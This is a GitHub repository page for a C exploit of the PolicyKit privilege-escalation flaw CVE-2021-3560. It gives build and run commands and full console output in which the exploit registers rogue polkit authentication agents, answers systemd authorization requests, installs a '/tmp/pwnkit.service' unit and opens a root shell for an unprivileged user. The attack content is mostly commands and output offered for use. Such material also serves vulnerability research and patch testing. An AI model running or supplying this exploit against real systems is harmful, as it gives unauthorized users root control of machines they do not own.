Skip to content

PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)

Notifications You must be signed in to change notification settings

WinMin/CVE-2021-3560

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

31 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)

C implementation of CVE-2021-3560 exploitation, blog posts about this exploitation:

Contributors

Code by swing (@WinMin), Ricter Z(@RicterZ)

Usage

dev@server:/tmp/CVE-2021-3560$ make
dev@server:/tmp/CVE-2021-3560$ ./exploit
pid:264181 - [ polkit CVE-2021-3560 exploit ] - RicterZ @ 360 Noah Lab, C writed by Swing @ chaitin
pid:264181 - [*] main process running ...
pid:264183 - [*] starting polkit authentication agent ...
pid:264182 - [*] starting polkit authentication agent ...
pid:264185 - [*] starting polkit authentication agent ...
pid:264183 - [*] trying to register authentication agent to polkit ...
pid:264182 - [*] trying to register authentication agent to polkit ...
pid:264183 - [+] polkit authentication agent registered successfully!
pid:264183 - [+] D-Bus message loop now running ..
pid:264185 - [*] trying to register authentication agent to polkit ...
pid:264182 - [+] polkit authentication agent registered successfully!
pid:264182 - [+] D-Bus message loop now running ..
pid:264185 - [+] polkit authentication agent registered successfully!
pid:264185 - [+] D-Bus message loop now running ..
pid:264183 - [*] trying to enable system unit file '/tmp/pwnkit.service' ...
pid:264182 - [*] trying to start systemd service 'pwnkit.service' ...
pid:264185 - [*] trying to reload systemd daemon ...
pid:264183 - [+] received authentication for action 'org.freedesktop.systemd1.manage-unit-files' ...
pid:264183 - [*] sending agent response with cookie: 61-bf243e2d0039ce513f32553f945c80d7-1-dddae4b0320b4030370585c13b6a9985
pid:264182 - [+] received authentication for action 'org.freedesktop.systemd1.manage-units' ...
pid:264182 - [*] sending agent response with cookie: 62-c23ffa64bf9c05a1ca8bf057d56a9dfd-1-8d220cfb275f861dcfacd340fc5a578a
pid:264185 - [+] received authentication for action 'org.freedesktop.systemd1.reload-daemon' ...
pid:264185 - [*] sending agent response with cookie: 63-3b99bb8ff0b6b3ffcb7e6103fbe86073-1-6d47c6a380691defd9c455eba617513d
pid:264181 - [+] file exists, popping root shell ...
pwned-5.0# id
uid=1000(dev) gid=1000(dev) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),1000(dev)
pwned-5.0#

About

PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)

Resources

Stars

Watchers

Forks

Packages

No packages published